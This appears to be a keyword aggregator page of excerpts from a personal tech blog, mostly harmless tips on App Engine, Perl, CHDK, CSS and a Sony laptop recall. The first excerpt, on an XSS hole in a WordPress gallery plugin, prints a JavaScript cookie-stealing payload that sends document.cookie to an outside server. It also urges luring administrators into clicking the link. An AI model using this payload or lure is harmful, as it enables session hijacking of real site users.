14 Aug, 2010

Right click your address bar and select paste and hit enter.

Articles related to right click your address bar and select paste and hit enter.

Wordpress nextGEN gallery XSS (Cross site scripting) Cookie Stealing Vulnerability

http://digitalpbk.blogspot.com/2009/07/wordpress-nextgen-gallery-xss.html code can be put for stealing the cookie:(new Image()).src = 'http://labs.kitiyo.com/store.php?cookie='+document.cookie+'&location;='+window.location;window.location = "URL back to the page";Then post this link accessible to site administrators or other registered users to click and hand us over their session cookies ;)I am infected now what to do? (for webmaster)The XSS is due to blindly allowing to print the $_GET variable onto the title. The makers of this plug ...
Published 2 years, 10 months ago

How to Download Google App Engine Code

http://digitalpbk.com/google-app-engine/how-to-download-app-engine-code How to Download Google App Engine Code .5 (Django is supported), JAVA and Google's own Google Go Programming language. App engine is designed so that you don't require Unix / Linux professionals to manage all your servers. As a developer you are independent to write and deploy the code without traffic management headache. Amazon EC2 is also one such service, but you still need some set up with load balancers initially. Install the Google App Engine SDK If you already do not have the SDK you should download the SDK as Google App ...
Published 7 months ago

Cancelling Automatic System Shutdown on XP

http://digitalpbk.blogspot.com/2007/03/cancelling-automatic-system-shutdown-on.html it .. Run the command prompt ( Start > Run > Open: cmd )In the command prompt, type : shutdown -aThats allThis procedure aborts the system shutdown and gives you enough time to save all your work. It is strongly recommended that you manually reboot the system after you are done with the saving. ...
Published 5 years, 2 months ago

Make WWW::Mechanize do not exit on GET Errors

http://digitalpbk.com/perl/wwwmechanize-error-geting-premature-do-not-exit-resume Make WWW::Mechanize do not exit on GET Errors When using PERL and WWW::Mechanize, your script can stop if there is some error in GETing a URL (such as 404 Not Found, 403 Permission Denied). Instead of resuming, the script terminates. If you want the script to continue resuming, you have to pass autocheck => 0 in the Mechanize class constructor as shown below my $mech = WWW::Mechanize->new(autocheck => 0); This makes sure that the mechanize library does not check for errors ...
Published 2 years, 2 months ago

Making Sony Ericsson Mobile Themes

http://digitalpbk.blogspot.com/2007/04/making-sony-ericsson-mobile-themes.html Making Sony Ericsson Mobile Themes IntroSony Ericsson mobile themes (.thm files) is simply a collection of a lot of images and an xml file that specifies the colour codes. Take a theme file rename it to .tar (use archive manager on linux or any standard compresssing utility) and unzip it using any standard unzipping utility. Just play with the files and images and you can make your self a new theme. Be it for W550i, W800i, W880i, K310i, K750i, K700i, etc ... Re-zip the contents and rename ...
Published 5 years, 1 month ago

CHDK for Canon SX120 IS Camera ( Canon Hack Development Kit )

http://digitalpbk.com/hardware/canon-sx120-chdk-camera-canon-hack-development-kit Digital Camera. Features and interfaces with Digic 4 Processor which are not enabled by default in the firmware is enabled by using CHDK. Compared to other camera like Sony DSC H20, H50 or Nikon L Series, the one thing makes Canon cameras interesting is CHDK which has scripting support in it. For people who are interested in development, firmware and scripting, this is an exciting feature. CHDK allows you to have much more features in your camera than the normal ones, For Eg, CHDK can be used ...
Published 2 years, 2 months ago

Error Installing PERL modules "unrecognized command line option -fstack -protector"

http://digitalpbk.com/perl/install-modules-unrecognized-command-line-option-fstack-protector Error Installing PERL modules "unrecognized command line option -fstack -protector" .609.tar.gz /usr/bin/make -- NOT OK Running make test Can't test without successful make Running make install Make had returned bad status, install seems impossible This error is due to older version of GCC in your system. The stack protector was introduced as of GCC 4. Look the version in your system by running gcc -v. Update your system if you are using cygwin run setup.exe and from the package list check GCC4, as shown below. (Search for GCC) Now try reinstalling the PERL module ...
Published 2 years, 2 months ago

Django SocialAuth Fix Google Email Open id attribute exchange

http://digitalpbk.com/django/django-social-auth-fix-google-open-id-email Django SocialAuth Fix Google Email Open id attribute exchange Django Social auth is a package that enables login to your django website with Facebook, Google, Yahoo and Twitter. Allowing authentication from 3rd party websites which supports open authentication helps users easy to register to your website without filling too much details. Easier signup makes more registrations and helps you cover your django web hosting charges :D . The package is managed at github here, but it does not have ...
Published 2 years ago

Sony Vaio F and CW series recalled due to heat problem VPCCW26FG

http://digitalpbk.com/sony-vaio/sony-vaio-f-and-cw-series-recalled-due-heat-problem-vpccw26fg Sony Vaio F and CW series recalled due to heat problem VPCCW26FG Sony is to recall over half a million laptops of its CW and F series due to a potential overheat problem. This problem is due to a bug in the firmware of the Sony Vaio CW series and Sony Vaio F series laptops. Sony has released a new firmware update to fix this issue that results in overheating and deformation of the laptop casing. Click Sony Vaio Firware update download to download and install the firmware update that solves ...
Published 1 year, 10 months ago

CSS Transparency Effects

http://digitalpbk.blogspot.com/2007/06/css-transparency-effects.html CSS Transparency Effects 10% 20% 30% 40% 50% 60% 70% 80% 90% 100% IntroCSS (Cascading Style Sheets) can be used to add cool effects to an ordinary looking web page. One such example is adding transparency effect to images or other portions including text of your website. in IEIn IE transparency is achieved by filter: alpha(opacity=XXX) where XXX takes value from 0 to 100. It indicates the % of opacity required.For example produces a semi transparent google logo.in FirefoxIn firefox the same ...
Published 4 years, 11 months ago

Related help topics for right click your address bar and select paste and hit enter. More keywords like right click your address bar and select paste and hit enter.
More pages for right click your address bar and select paste and hit enter.


Email Newsletter
Email:
Popular Posts
Recent Posts
Tags
Random photo
Beach is this way Beach is this way in Havelock Island Andaman
On Facebook
Recent Comments


digitalpbk